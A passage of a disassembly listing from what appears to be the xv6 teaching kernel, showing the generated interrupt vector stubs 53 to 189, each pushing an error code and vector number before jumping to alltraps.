$0 80105f1b: 6a 00 push $0x0 pushl $52 80105f1d: 6a 34 push $0x34 jmp alltraps 80105f1f: e9 75 f9 ff ff jmp 80105899 <alltraps> 80105f24 <vector53>: .globl vector53 vector53: pushl $0 80105f24: 6a 00 push $0x0 pushl $53 80105f26: 6a 35 push $0x35 jmp alltraps 80105f28: e9 6c f9 ff ff jmp 80105899 <alltraps> 80105f2d <vector54>: .globl vector54 vector54: pushl $0 80105f2d: 6a 00 push $0x0 pushl $54 80105f2f: 6a 36 push $0x36 jmp alltraps 80105f31: e9 63 f9 ff ff jmp 80105899 <alltraps> 80105f36 <vector55>: .globl vector55 vector55: pushl $0 80105f36: 6a 00 push $0x0 pushl $55 80105f38: 6a 37 push $0x37 jmp alltraps 80105f3a: e9 5a f9 ff ff jmp 80105899 <alltraps> 80105f3f <vector56>: .globl vector56 vector56: pushl $0 80105f3f: 6a 00 push $0x0 pushl $56 80105f41: 6a 38 push $0x38 jmp alltraps 80105f43: e9 51 f9 ff ff jmp 80105899 <alltraps> 80105f48 <vector57>: .globl vector57 vector57: pushl $0 80105f48: 6a 00 push $0x0 pushl $57 80105f4a: 6a 39 push $0x39 jmp alltraps 80105f4c: e9 48 f9 ff ff jmp 80105899 <alltraps> 80105f51 <vector58>: .globl vector58 vector58: pushl $0 80105f51: 6a 00 push $0x0 pushl $58 80105f53: 6a 3a push $0x3a jmp alltraps 80105f55: e9 3f f9 ff ff jmp 80105899 <alltraps> 80105f5a <vector59>: .globl vector59 vector59: pushl $0 80105f5a: 6a 00 push $0x0 pushl $59 80105f5c: 6a 3b push $0x3b jmp alltraps 80105f5e: e9 36 f9 ff ff jmp 80105899 <alltraps> 80105f63 <vector60>: .globl vector60 vector60: pushl $0 80105f63: 6a 00 push $0x0 pushl $60 80105f65: 6a 3c push $0x3c jmp alltraps 80105f67: e9 2d f9 ff ff jmp 80105899 <alltraps> 80105f6c <vector61>: .globl vector61 vector61: pushl $0 80105f6c: 6a 00 push $0x0 pushl $61 80105f6e: 6a 3d push $0x3d jmp alltraps 80105f70: e9 24 f9 ff ff jmp 80105899 <alltraps> 80105f75 <vector62>: .globl vector62 vector62: pushl $0 80105f75: 6a 00 push $0x0 pushl $62 80105f77: 6a 3e push $0x3e jmp alltraps 80105f79: e9 1b f9 ff ff jmp 80105899 <alltraps> 80105f7e <vector63>: .globl vector63 vector63: pushl $0 80105f7e: 6a 00 push $0x0 pushl $63 80105f80: 6a 3f push $0x3f jmp alltraps 80105f82: e9 12 f9 ff ff jmp 80105899 <alltraps> 80105f87 <vector64>: .globl vector64 vector64: pushl $0 80105f87: 6a 00 push $0x0 pushl $64 80105f89: 6a 40 push $0x40 jmp alltraps 80105f8b: e9 09 f9 ff ff jmp 80105899 <alltraps> 80105f90 <vector65>: .globl vector65 vector65: pushl $0 80105f90: 6a 00 push $0x0 pushl $65 80105f92: 6a 41 push $0x41 jmp alltraps 80105f94: e9 00 f9 ff ff jmp 80105899 <alltraps> 80105f99 <vector66>: .globl vector66 vector66: pushl $0 80105f99: 6a 00 push $0x0 pushl $66 80105f9b: 6a 42 push $0x42 jmp alltraps 80105f9d: e9 f7 f8 ff ff jmp 80105899 <alltraps> 80105fa2 <vector67>: .globl vector67 vector67: pushl $0 80105fa2: 6a 00 push $0x0 pushl $67 80105fa4: 6a 43 push $0x43 jmp alltraps 80105fa6: e9 ee f8 ff ff jmp 80105899 <alltraps> 80105fab <vector68>: .globl vector68 vector68: pushl $0 80105fab: 6a 00 push $0x0 pushl $68 80105fad: 6a 44 push $0x44 jmp alltraps 80105faf: e9 e5 f8 ff ff jmp 80105899 <alltraps> 80105fb4 <vector69>: .globl vector69 vector69: pushl $0 80105fb4: 6a 00 push $0x0 pushl $69 80105fb6: 6a 45 push $0x45 jmp alltraps 80105fb8: e9 dc f8 ff ff jmp 80105899 <alltraps> 80105fbd <vector70>: .globl vector70 vector70: pushl $0 80105fbd: 6a 00 push $0x0 pushl $70 80105fbf: 6a 46 push $0x46 jmp alltraps 80105fc1: e9 d3 f8 ff ff jmp 80105899 <alltraps> 80105fc6 <vector71>: .globl vector71 vector71: pushl $0 80105fc6: 6a 00 push $0x0 pushl $71 80105fc8: 6a 47 push $0x47 jmp alltraps 80105fca: e9 ca f8 ff ff jmp 80105899 <alltraps> 80105fcf <vector72>: .globl vector72 vector72: pushl $0 80105fcf: 6a 00 push $0x0 pushl $72 80105fd1: 6a 48 push $0x48 jmp alltraps 80105fd3: e9 c1 f8 ff ff jmp 80105899 <alltraps> 80105fd8 <vector73>: .globl vector73 vector73: pushl $0 80105fd8: 6a 00 push $0x0 pushl $73 80105fda: 6a 49 push $0x49 jmp alltraps 80105fdc: e9 b8 f8 ff ff jmp 80105899 <alltraps> 80105fe1 <vector74>: .globl vector74 vector74: pushl $0 80105fe1: 6a 00 push $0x0 pushl $74 80105fe3: 6a 4a push $0x4a jmp alltraps 80105fe5: e9 af f8 ff ff jmp 80105899 <alltraps> 80105fea <vector75>: .globl vector75 vector75: pushl $0 80105fea: 6a 00 push $0x0 pushl $75 80105fec: 6a 4b push $0x4b jmp alltraps 80105fee: e9 a6 f8 ff ff jmp 80105899 <alltraps> 80105ff3 <vector76>: .globl vector76 vector76: pushl $0 80105ff3: 6a 00 push $0x0 pushl $76 80105ff5: 6a 4c push $0x4c jmp alltraps 80105ff7: e9 9d f8 ff ff jmp 80105899 <alltraps> 80105ffc <vector77>: .globl vector77 vector77: pushl $0 80105ffc: 6a 00 push $0x0 pushl $77 80105ffe: 6a 4d push $0x4d jmp alltraps 80106000: e9 94 f8 ff ff jmp 80105899 <alltraps> 80106005 <vector78>: .globl vector78 vector78: pushl $0 80106005: 6a 00 push $0x0 pushl $78 80106007: 6a 4e push $0x4e jmp alltraps 80106009: e9 8b f8 ff ff jmp 80105899 <alltraps> 8010600e <vector79>: .globl vector79 vector79: pushl $0 8010600e: 6a 00 push $0x0 pushl $79 80106010: 6a 4f push $0x4f jmp alltraps 80106012: e9 82 f8 ff ff jmp 80105899 <alltraps> 80106017 <vector80>: .globl vector80 vector80: pushl $0 80106017: 6a 00 push $0x0 pushl $80 80106019: 6a 50 push $0x50 jmp alltraps 8010601b: e9 79 f8 ff ff jmp 80105899 <alltraps> 80106020 <vector81>: .globl vector81 vector81: pushl $0 80106020: 6a 00 push $0x0 pushl $81 80106022: 6a 51 push $0x51 jmp alltraps 80106024: e9 70 f8 ff ff jmp 80105899 <alltraps> 80106029 <vector82>: .globl vector82 vector82: pushl $0 80106029: 6a 00 push $0x0 pushl $82 8010602b: 6a 52 push $0x52 jmp alltraps 8010602d: e9 67 f8 ff ff jmp 80105899 <alltraps> 80106032 <vector83>: .globl vector83 vector83: pushl $0 80106032: 6a 00 push $0x0 pushl $83 80106034: 6a 53 push $0x53 jmp alltraps 80106036: e9 5e f8 ff ff jmp 80105899 <alltraps> 8010603b <vector84>: .globl vector84 vector84: pushl $0 8010603b: 6a 00 push $0x0 pushl $84 8010603d: 6a 54 push $0x54 jmp alltraps 8010603f: e9 55 f8 ff ff jmp 80105899 <alltraps> 80106044 <vector85>: .globl vector85 vector85: pushl $0 80106044: 6a 00 push $0x0 pushl $85 80106046: 6a 55 push $0x55 jmp alltraps 80106048: e9 4c f8 ff ff jmp 80105899 <alltraps> 8010604d <vector86>: .globl vector86 vector86: pushl $0 8010604d: 6a 00 push $0x0 pushl $86 8010604f: 6a 56 push $0x56 jmp alltraps 80106051: e9 43 f8 ff ff jmp 80105899 <alltraps> 80106056 <vector87>: .globl vector87 vector87: pushl $0 80106056: 6a 00 push $0x0 pushl $87 80106058: 6a 57 push $0x57 jmp alltraps 8010605a: e9 3a f8 ff ff jmp 80105899 <alltraps> 8010605f <vector88>: .globl vector88 vector88: pushl $0 8010605f: 6a 00 push $0x0 pushl $88 80106061: 6a 58 push $0x58 jmp alltraps 80106063: e9 31 f8 ff ff jmp 80105899 <alltraps> 80106068 <vector89>: .globl vector89 vector89: pushl $0 80106068: 6a 00 push $0x0 pushl $89 8010606a: 6a 59 push $0x59 jmp alltraps 8010606c: e9 28 f8 ff ff jmp 80105899 <alltraps> 80106071 <vector90>: .globl vector90 vector90: pushl $0 80106071: 6a 00 push $0x0 pushl $90 80106073: 6a 5a push $0x5a jmp alltraps 80106075: e9 1f f8 ff ff jmp 80105899 <alltraps> 8010607a <vector91>: .globl vector91 vector91: pushl $0 8010607a: 6a 00 push $0x0 pushl $91 8010607c: 6a 5b push $0x5b jmp alltraps 8010607e: e9 16 f8 ff ff jmp 80105899 <alltraps> 80106083 <vector92>: .globl vector92 vector92: pushl $0 80106083: 6a 00 push $0x0 pushl $92 80106085: 6a 5c push $0x5c jmp alltraps 80106087: e9 0d f8 ff ff jmp 80105899 <alltraps> 8010608c <vector93>: .globl vector93 vector93: pushl $0 8010608c: 6a 00 push $0x0 pushl $93 8010608e: 6a 5d push $0x5d jmp alltraps 80106090: e9 04 f8 ff ff jmp 80105899 <alltraps> 80106095 <vector94>: .globl vector94 vector94: pushl $0 80106095: 6a 00 push $0x0 pushl $94 80106097: 6a 5e push $0x5e jmp alltraps 80106099: e9 fb f7 ff ff jmp 80105899 <alltraps> 8010609e <vector95>: .globl vector95 vector95: pushl $0 8010609e: 6a 00 push $0x0 pushl $95 801060a0: 6a 5f push $0x5f jmp alltraps 801060a2: e9 f2 f7 ff ff jmp 80105899 <alltraps> 801060a7 <vector96>: .globl vector96 vector96: pushl $0 801060a7: 6a 00 push $0x0 pushl $96 801060a9: 6a 60 push $0x60 jmp alltraps 801060ab: e9 e9 f7 ff ff jmp 80105899 <alltraps> 801060b0 <vector97>: .globl vector97 vector97: pushl $0 801060b0: 6a 00 push $0x0 pushl $97 801060b2: 6a 61 push $0x61 jmp alltraps 801060b4: e9 e0 f7 ff ff jmp 80105899 <alltraps> 801060b9 <vector98>: .globl vector98 vector98: pushl $0 801060b9: 6a 00 push $0x0 pushl $98 801060bb: 6a 62 push $0x62 jmp alltraps 801060bd: e9 d7 f7 ff ff jmp 80105899 <alltraps> 801060c2 <vector99>: .globl vector99 vector99: pushl $0 801060c2: 6a 00 push $0x0 pushl $99 801060c4: 6a 63 push $0x63 jmp alltraps 801060c6: e9 ce f7 ff ff jmp 80105899 <alltraps> 801060cb <vector100>: .globl vector100 vector100: pushl $0 801060cb: 6a 00 push $0x0 pushl $100 801060cd: 6a 64 push $0x64 jmp alltraps 801060cf: e9 c5 f7 ff ff jmp 80105899 <alltraps> 801060d4 <vector101>: .globl vector101 vector101: pushl $0 801060d4: 6a 00 push $0x0 pushl $101 801060d6: 6a 65 push $0x65 jmp alltraps 801060d8: e9 bc f7 ff ff jmp 80105899 <alltraps> 801060dd <vector102>: .globl vector102 vector102: pushl $0 801060dd: 6a 00 push $0x0 pushl $102 801060df: 6a 66 push $0x66 jmp alltraps 801060e1: e9 b3 f7 ff ff jmp 80105899 <alltraps> 801060e6 <vector103>: .globl vector103 vector103: pushl $0 801060e6: 6a 00 push $0x0 pushl $103 801060e8: 6a 67 push $0x67 jmp alltraps 801060ea: e9 aa f7 ff ff jmp 80105899 <alltraps> 801060ef <vector104>: .globl vector104 vector104: pushl $0 801060ef: 6a 00 push $0x0 pushl $104 801060f1: 6a 68 push $0x68 jmp alltraps 801060f3: e9 a1 f7 ff ff jmp 80105899 <alltraps> 801060f8 <vector105>: .globl vector105 vector105: pushl $0 801060f8: 6a 00 push $0x0 pushl $105 801060fa: 6a 69 push $0x69 jmp alltraps 801060fc: e9 98 f7 ff ff jmp 80105899 <alltraps> 80106101 <vector106>: .globl vector106 vector106: pushl $0 80106101: 6a 00 push $0x0 pushl $106 80106103: 6a 6a push $0x6a jmp alltraps 80106105: e9 8f f7 ff ff jmp 80105899 <alltraps> 8010610a <vector107>: .globl vector107 vector107: pushl $0 8010610a: 6a 00 push $0x0 pushl $107 8010610c: 6a 6b push $0x6b jmp alltraps 8010610e: e9 86 f7 ff ff jmp 80105899 <alltraps> 80106113 <vector108>: .globl vector108 vector108: pushl $0 80106113: 6a 00 push $0x0 pushl $108 80106115: 6a 6c push $0x6c jmp alltraps 80106117: e9 7d f7 ff ff jmp 80105899 <alltraps> 8010611c <vector109>: .globl vector109 vector109: pushl $0 8010611c: 6a 00 push $0x0 pushl $109 8010611e: 6a 6d push $0x6d jmp alltraps 80106120: e9 74 f7 ff ff jmp 80105899 <alltraps> 80106125 <vector110>: .globl vector110 vector110: pushl $0 80106125: 6a 00 push $0x0 pushl $110 80106127: 6a 6e push $0x6e jmp alltraps 80106129: e9 6b f7 ff ff jmp 80105899 <alltraps> 8010612e <vector111>: .globl vector111 vector111: pushl $0 8010612e: 6a 00 push $0x0 pushl $111 80106130: 6a 6f push $0x6f jmp alltraps 80106132: e9 62 f7 ff ff jmp 80105899 <alltraps> 80106137 <vector112>: .globl vector112 vector112: pushl $0 80106137: 6a 00 push $0x0 pushl $112 80106139: 6a 70 push $0x70 jmp alltraps 8010613b: e9 59 f7 ff ff jmp 80105899 <alltraps> 80106140 <vector113>: .globl vector113 vector113: pushl $0 80106140: 6a 00 push $0x0 pushl $113 80106142: 6a 71 push $0x71 jmp alltraps 80106144: e9 50 f7 ff ff jmp 80105899 <alltraps> 80106149 <vector114>: .globl vector114 vector114: pushl $0 80106149: 6a 00 push $0x0 pushl $114 8010614b: 6a 72 push $0x72 jmp alltraps 8010614d: e9 47 f7 ff ff jmp 80105899 <alltraps> 80106152 <vector115>: .globl vector115 vector115: pushl $0 80106152: 6a 00 push $0x0 pushl $115 80106154: 6a 73 push $0x73 jmp alltraps 80106156: e9 3e f7 ff ff jmp 80105899 <alltraps> 8010615b <vector116>: .globl vector116 vector116: pushl $0 8010615b: 6a 00 push $0x0 pushl $116 8010615d: 6a 74 push $0x74 jmp alltraps 8010615f: e9 35 f7 ff ff jmp 80105899 <alltraps> 80106164 <vector117>: .globl vector117 vector117: pushl $0 80106164: 6a 00 push $0x0 pushl $117 80106166: 6a 75 push $0x75 jmp alltraps 80106168: e9 2c f7 ff ff jmp 80105899 <alltraps> 8010616d <vector118>: .globl vector118 vector118: pushl $0 8010616d: 6a 00 push $0x0 pushl $118 8010616f: 6a 76 push $0x76 jmp alltraps 80106171: e9 23 f7 ff ff jmp 80105899 <alltraps> 80106176 <vector119>: .globl vector119 vector119: pushl $0 80106176: 6a 00 push $0x0 pushl $119 80106178: 6a 77 push $0x77 jmp alltraps 8010617a: e9 1a f7 ff ff jmp 80105899 <alltraps> 8010617f <vector120>: .globl vector120 vector120: pushl $0 8010617f: 6a 00 push $0x0 pushl $120 80106181: 6a 78 push $0x78 jmp alltraps 80106183: e9 11 f7 ff ff jmp 80105899 <alltraps> 80106188 <vector121>: .globl vector121 vector121: pushl $0 80106188: 6a 00 push $0x0 pushl $121 8010618a: 6a 79 push $0x79 jmp alltraps 8010618c: e9 08 f7 ff ff jmp 80105899 <alltraps> 80106191 <vector122>: .globl vector122 vector122: pushl $0 80106191: 6a 00 push $0x0 pushl $122 80106193: 6a 7a push $0x7a jmp alltraps 80106195: e9 ff f6 ff ff jmp 80105899 <alltraps> 8010619a <vector123>: .globl vector123 vector123: pushl $0 8010619a: 6a 00 push $0x0 pushl $123 8010619c: 6a 7b push $0x7b jmp alltraps 8010619e: e9 f6 f6 ff ff jmp 80105899 <alltraps> 801061a3 <vector124>: .globl vector124 vector124: pushl $0 801061a3: 6a 00 push $0x0 pushl $124 801061a5: 6a 7c push $0x7c jmp alltraps 801061a7: e9 ed f6 ff ff jmp 80105899 <alltraps> 801061ac <vector125>: .globl vector125 vector125: pushl $0 801061ac: 6a 00 push $0x0 pushl $125 801061ae: 6a 7d push $0x7d jmp alltraps 801061b0: e9 e4 f6 ff ff jmp 80105899 <alltraps> 801061b5 <vector126>: .globl vector126 vector126: pushl $0 801061b5: 6a 00 push $0x0 pushl $126 801061b7: 6a 7e push $0x7e jmp alltraps 801061b9: e9 db f6 ff ff jmp 80105899 <alltraps> 801061be <vector127>: .globl vector127 vector127: pushl $0 801061be: 6a 00 push $0x0 pushl $127 801061c0: 6a 7f push $0x7f jmp alltraps 801061c2: e9 d2 f6 ff ff jmp 80105899 <alltraps> 801061c7 <vector128>: .globl vector128 vector128: pushl $0 801061c7: 6a 00 push $0x0 pushl $128 801061c9: 68 80 00 00 00 push $0x80 jmp alltraps 801061ce: e9 c6 f6 ff ff jmp 80105899 <alltraps> 801061d3 <vector129>: .globl vector129 vector129: pushl $0 801061d3: 6a 00 push $0x0 pushl $129 801061d5: 68 81 00 00 00 push $0x81 jmp alltraps 801061da: e9 ba f6 ff ff jmp 80105899 <alltraps> 801061df <vector130>: .globl vector130 vector130: pushl $0 801061df: 6a 00 push $0x0 pushl $130 801061e1: 68 82 00 00 00 push $0x82 jmp alltraps 801061e6: e9 ae f6 ff ff jmp 80105899 <alltraps> 801061eb <vector131>: .globl vector131 vector131: pushl $0 801061eb: 6a 00 push $0x0 pushl $131 801061ed: 68 83 00 00 00 push $0x83 jmp alltraps 801061f2: e9 a2 f6 ff ff jmp 80105899 <alltraps> 801061f7 <vector132>: .globl vector132 vector132: pushl $0 801061f7: 6a 00 push $0x0 pushl $132 801061f9: 68 84 00 00 00 push $0x84 jmp alltraps 801061fe: e9 96 f6 ff ff jmp 80105899 <alltraps> 80106203 <vector133>: .globl vector133 vector133: pushl $0 80106203: 6a 00 push $0x0 pushl $133 80106205: 68 85 00 00 00 push $0x85 jmp alltraps 8010620a: e9 8a f6 ff ff jmp 80105899 <alltraps> 8010620f <vector134>: .globl vector134 vector134: pushl $0 8010620f: 6a 00 push $0x0 pushl $134 80106211: 68 86 00 00 00 push $0x86 jmp alltraps 80106216: e9 7e f6 ff ff jmp 80105899 <alltraps> 8010621b <vector135>: .globl vector135 vector135: pushl $0 8010621b: 6a 00 push $0x0 pushl $135 8010621d: 68 87 00 00 00 push $0x87 jmp alltraps 80106222: e9 72 f6 ff ff jmp 80105899 <alltraps> 80106227 <vector136>: .globl vector136 vector136: pushl $0 80106227: 6a 00 push $0x0 pushl $136 80106229: 68 88 00 00 00 push $0x88 jmp alltraps 8010622e: e9 66 f6 ff ff jmp 80105899 <alltraps> 80106233 <vector137>: .globl vector137 vector137: pushl $0 80106233: 6a 00 push $0x0 pushl $137 80106235: 68 89 00 00 00 push $0x89 jmp alltraps 8010623a: e9 5a f6 ff ff jmp 80105899 <alltraps> 8010623f <vector138>: .globl vector138 vector138: pushl $0 8010623f: 6a 00 push $0x0 pushl $138 80106241: 68 8a 00 00 00 push $0x8a jmp alltraps 80106246: e9 4e f6 ff ff jmp 80105899 <alltraps> 8010624b <vector139>: .globl vector139 vector139: pushl $0 8010624b: 6a 00 push $0x0 pushl $139 8010624d: 68 8b 00 00 00 push $0x8b jmp alltraps 80106252: e9 42 f6 ff ff jmp 80105899 <alltraps> 80106257 <vector140>: .globl vector140 vector140: pushl $0 80106257: 6a 00 push $0x0 pushl $140 80106259: 68 8c 00 00 00 push $0x8c jmp alltraps 8010625e: e9 36 f6 ff ff jmp 80105899 <alltraps> 80106263 <vector141>: .globl vector141 vector141: pushl $0 80106263: 6a 00 push $0x0 pushl $141 80106265: 68 8d 00 00 00 push $0x8d jmp alltraps 8010626a: e9 2a f6 ff ff jmp 80105899 <alltraps> 8010626f <vector142>: .globl vector142 vector142: pushl $0 8010626f: 6a 00 push $0x0 pushl $142 80106271: 68 8e 00 00 00 push $0x8e jmp alltraps 80106276: e9 1e f6 ff ff jmp 80105899 <alltraps> 8010627b <vector143>: .globl vector143 vector143: pushl $0 8010627b: 6a 00 push $0x0 pushl $143 8010627d: 68 8f 00 00 00 push $0x8f jmp alltraps 80106282: e9 12 f6 ff ff jmp 80105899 <alltraps> 80106287 <vector144>: .globl vector144 vector144: pushl $0 80106287: 6a 00 push $0x0 pushl $144 80106289: 68 90 00 00 00 push $0x90 jmp alltraps 8010628e: e9 06 f6 ff ff jmp 80105899 <alltraps> 80106293 <vector145>: .globl vector145 vector145: pushl $0 80106293: 6a 00 push $0x0 pushl $145 80106295: 68 91 00 00 00 push $0x91 jmp alltraps 8010629a: e9 fa f5 ff ff jmp 80105899 <alltraps> 8010629f <vector146>: .globl vector146 vector146: pushl $0 8010629f: 6a 00 push $0x0 pushl $146 801062a1: 68 92 00 00 00 push $0x92 jmp alltraps 801062a6: e9 ee f5 ff ff jmp 80105899 <alltraps> 801062ab <vector147>: .globl vector147 vector147: pushl $0 801062ab: 6a 00 push $0x0 pushl $147 801062ad: 68 93 00 00 00 push $0x93 jmp alltraps 801062b2: e9 e2 f5 ff ff jmp 80105899 <alltraps> 801062b7 <vector148>: .globl vector148 vector148: pushl $0 801062b7: 6a 00 push $0x0 pushl $148 801062b9: 68 94 00 00 00 push $0x94 jmp alltraps 801062be: e9 d6 f5 ff ff jmp 80105899 <alltraps> 801062c3 <vector149>: .globl vector149 vector149: pushl $0 801062c3: 6a 00 push $0x0 pushl $149 801062c5: 68 95 00 00 00 push $0x95 jmp alltraps 801062ca: e9 ca f5 ff ff jmp 80105899 <alltraps> 801062cf <vector150>: .globl vector150 vector150: pushl $0 801062cf: 6a 00 push $0x0 pushl $150 801062d1: 68 96 00 00 00 push $0x96 jmp alltraps 801062d6: e9 be f5 ff ff jmp 80105899 <alltraps> 801062db <vector151>: .globl vector151 vector151: pushl $0 801062db: 6a 00 push $0x0 pushl $151 801062dd: 68 97 00 00 00 push $0x97 jmp alltraps 801062e2: e9 b2 f5 ff ff jmp 80105899 <alltraps> 801062e7 <vector152>: .globl vector152 vector152: pushl $0 801062e7: 6a 00 push $0x0 pushl $152 801062e9: 68 98 00 00 00 push $0x98 jmp alltraps 801062ee: e9 a6 f5 ff ff jmp 80105899 <alltraps> 801062f3 <vector153>: .globl vector153 vector153: pushl $0 801062f3: 6a 00 push $0x0 pushl $153 801062f5: 68 99 00 00 00 push $0x99 jmp alltraps 801062fa: e9 9a f5 ff ff jmp 80105899 <alltraps> 801062ff <vector154>: .globl vector154 vector154: pushl $0 801062ff: 6a 00 push $0x0 pushl $154 80106301: 68 9a 00 00 00 push $0x9a jmp alltraps 80106306: e9 8e f5 ff ff jmp 80105899 <alltraps> 8010630b <vector155>: .globl vector155 vector155: pushl $0 8010630b: 6a 00 push $0x0 pushl $155 8010630d: 68 9b 00 00 00 push $0x9b jmp alltraps 80106312: e9 82 f5 ff ff jmp 80105899 <alltraps> 80106317 <vector156>: .globl vector156 vector156: pushl $0 80106317: 6a 00 push $0x0 pushl $156 80106319: 68 9c 00 00 00 push $0x9c jmp alltraps 8010631e: e9 76 f5 ff ff jmp 80105899 <alltraps> 80106323 <vector157>: .globl vector157 vector157: pushl $0 80106323: 6a 00 push $0x0 pushl $157 80106325: 68 9d 00 00 00 push $0x9d jmp alltraps 8010632a: e9 6a f5 ff ff jmp 80105899 <alltraps> 8010632f <vector158>: .globl vector158 vector158: pushl $0 8010632f: 6a 00 push $0x0 pushl $158 80106331: 68 9e 00 00 00 push $0x9e jmp alltraps 80106336: e9 5e f5 ff ff jmp 80105899 <alltraps> 8010633b <vector159>: .globl vector159 vector159: pushl $0 8010633b: 6a 00 push $0x0 pushl $159 8010633d: 68 9f 00 00 00 push $0x9f jmp alltraps 80106342: e9 52 f5 ff ff jmp 80105899 <alltraps> 80106347 <vector160>: .globl vector160 vector160: pushl $0 80106347: 6a 00 push $0x0 pushl $160 80106349: 68 a0 00 00 00 push $0xa0 jmp alltraps 8010634e: e9 46 f5 ff ff jmp 80105899 <alltraps> 80106353 <vector161>: .globl vector161 vector161: pushl $0 80106353: 6a 00 push $0x0 pushl $161 80106355: 68 a1 00 00 00 push $0xa1 jmp alltraps 8010635a: e9 3a f5 ff ff jmp 80105899 <alltraps> 8010635f <vector162>: .globl vector162 vector162: pushl $0 8010635f: 6a 00 push $0x0 pushl $162 80106361: 68 a2 00 00 00 push $0xa2 jmp alltraps 80106366: e9 2e f5 ff ff jmp 80105899 <alltraps> 8010636b <vector163>: .globl vector163 vector163: pushl $0 8010636b: 6a 00 push $0x0 pushl $163 8010636d: 68 a3 00 00 00 push $0xa3 jmp alltraps 80106372: e9 22 f5 ff ff jmp 80105899 <alltraps> 80106377 <vector164>: .globl vector164 vector164: pushl $0 80106377: 6a 00 push $0x0 pushl $164 80106379: 68 a4 00 00 00 push $0xa4 jmp alltraps 8010637e: e9 16 f5 ff ff jmp 80105899 <alltraps> 80106383 <vector165>: .globl vector165 vector165: pushl $0 80106383: 6a 00 push $0x0 pushl $165 80106385: 68 a5 00 00 00 push $0xa5 jmp alltraps 8010638a: e9 0a f5 ff ff jmp 80105899 <alltraps> 8010638f <vector166>: .globl vector166 vector166: pushl $0 8010638f: 6a 00 push $0x0 pushl $166 80106391: 68 a6 00 00 00 push $0xa6 jmp alltraps 80106396: e9 fe f4 ff ff jmp 80105899 <alltraps> 8010639b <vector167>: .globl vector167 vector167: pushl $0 8010639b: 6a 00 push $0x0 pushl $167 8010639d: 68 a7 00 00 00 push $0xa7 jmp alltraps 801063a2: e9 f2 f4 ff ff jmp 80105899 <alltraps> 801063a7 <vector168>: .globl vector168 vector168: pushl $0 801063a7: 6a 00 push $0x0 pushl $168 801063a9: 68 a8 00 00 00 push $0xa8 jmp alltraps 801063ae: e9 e6 f4 ff ff jmp 80105899 <alltraps> 801063b3 <vector169>: .globl vector169 vector169: pushl $0 801063b3: 6a 00 push $0x0 pushl $169 801063b5: 68 a9 00 00 00 push $0xa9 jmp alltraps 801063ba: e9 da f4 ff ff jmp 80105899 <alltraps> 801063bf <vector170>: .globl vector170 vector170: pushl $0 801063bf: 6a 00 push $0x0 pushl $170 801063c1: 68 aa 00 00 00 push $0xaa jmp alltraps 801063c6: e9 ce f4 ff ff jmp 80105899 <alltraps> 801063cb <vector171>: .globl vector171 vector171: pushl $0 801063cb: 6a 00 push $0x0 pushl $171 801063cd: 68 ab 00 00 00 push $0xab jmp alltraps 801063d2: e9 c2 f4 ff ff jmp 80105899 <alltraps> 801063d7 <vector172>: .globl vector172 vector172: pushl $0 801063d7: 6a 00 push $0x0 pushl $172 801063d9: 68 ac 00 00 00 push $0xac jmp alltraps 801063de: e9 b6 f4 ff ff jmp 80105899 <alltraps> 801063e3 <vector173>: .globl vector173 vector173: pushl $0 801063e3: 6a 00 push $0x0 pushl $173 801063e5: 68 ad 00 00 00 push $0xad jmp alltraps 801063ea: e9 aa f4 ff ff jmp 80105899 <alltraps> 801063ef <vector174>: .globl vector174 vector174: pushl $0 801063ef: 6a 00 push $0x0 pushl $174 801063f1: 68 ae 00 00 00 push $0xae jmp alltraps 801063f6: e9 9e f4 ff ff jmp 80105899 <alltraps> 801063fb <vector175>: .globl vector175 vector175: pushl $0 801063fb: 6a 00 push $0x0 pushl $175 801063fd: 68 af 00 00 00 push $0xaf jmp alltraps 80106402: e9 92 f4 ff ff jmp 80105899 <alltraps> 80106407 <vector176>: .globl vector176 vector176: pushl $0 80106407: 6a 00 push $0x0 pushl $176 80106409: 68 b0 00 00 00 push $0xb0 jmp alltraps 8010640e: e9 86 f4 ff ff jmp 80105899 <alltraps> 80106413 <vector177>: .globl vector177 vector177: pushl $0 80106413: 6a 00 push $0x0 pushl $177 80106415: 68 b1 00 00 00 push $0xb1 jmp alltraps 8010641a: e9 7a f4 ff ff jmp 80105899 <alltraps> 8010641f <vector178>: .globl vector178 vector178: pushl $0 8010641f: 6a 00 push $0x0 pushl $178 80106421: 68 b2 00 00 00 push $0xb2 jmp alltraps 80106426: e9 6e f4 ff ff jmp 80105899 <alltraps> 8010642b <vector179>: .globl vector179 vector179: pushl $0 8010642b: 6a 00 push $0x0 pushl $179 8010642d: 68 b3 00 00 00 push $0xb3 jmp alltraps 80106432: e9 62 f4 ff ff jmp 80105899 <alltraps> 80106437 <vector180>: .globl vector180 vector180: pushl $0 80106437: 6a 00 push $0x0 pushl $180 80106439: 68 b4 00 00 00 push $0xb4 jmp alltraps 8010643e: e9 56 f4 ff ff jmp 80105899 <alltraps> 80106443 <vector181>: .globl vector181 vector181: pushl $0 80106443: 6a 00 push $0x0 pushl $181 80106445: 68 b5 00 00 00 push $0xb5 jmp alltraps 8010644a: e9 4a f4 ff ff jmp 80105899 <alltraps> 8010644f <vector182>: .globl vector182 vector182: pushl $0 8010644f: 6a 00 push $0x0 pushl $182 80106451: 68 b6 00 00 00 push $0xb6 jmp alltraps 80106456: e9 3e f4 ff ff jmp 80105899 <alltraps> 8010645b <vector183>: .globl vector183 vector183: pushl $0 8010645b: 6a 00 push $0x0 pushl $183 8010645d: 68 b7 00 00 00 push $0xb7 jmp alltraps 80106462: e9 32 f4 ff ff jmp 80105899 <alltraps> 80106467 <vector184>: .globl vector184 vector184: pushl $0 80106467: 6a 00 push $0x0 pushl $184 80106469: 68 b8 00 00 00 push $0xb8 jmp alltraps 8010646e: e9 26 f4 ff ff jmp 80105899 <alltraps> 80106473 <vector185>: .globl vector185 vector185: pushl $0 80106473: 6a 00 push $0x0 pushl $185 80106475: 68 b9 00 00 00 push $0xb9 jmp alltraps 8010647a: e9 1a f4 ff ff jmp 80105899 <alltraps> 8010647f <vector186>: .globl vector186 vector186: pushl $0 8010647f: 6a 00 push $0x0 pushl $186 80106481: 68 ba 00 00 00 push $0xba jmp alltraps 80106486: e9 0e f4 ff ff jmp 80105899 <alltraps> 8010648b <vector187>: .globl vector187 vector187: pushl $0 8010648b: 6a 00 push $0x0 pushl $187 8010648d: 68 bb 00 00 00 push $0xbb jmp alltraps 80106492: e9 02 f4 ff ff jmp 80105899 <alltraps> 80106497 <vector188>: .globl vector188 vector188: pushl $0 80106497: 6a 00 push $0x0 pushl $188 80106499: 68 bc 00 00 00 push $0xbc jmp alltraps 8010649e: e9 f6 f3 ff ff jmp 80105899 <alltraps> 801064a3 <vector189>: .globl vector189 vector189: pushl $0 801064a3: 6a 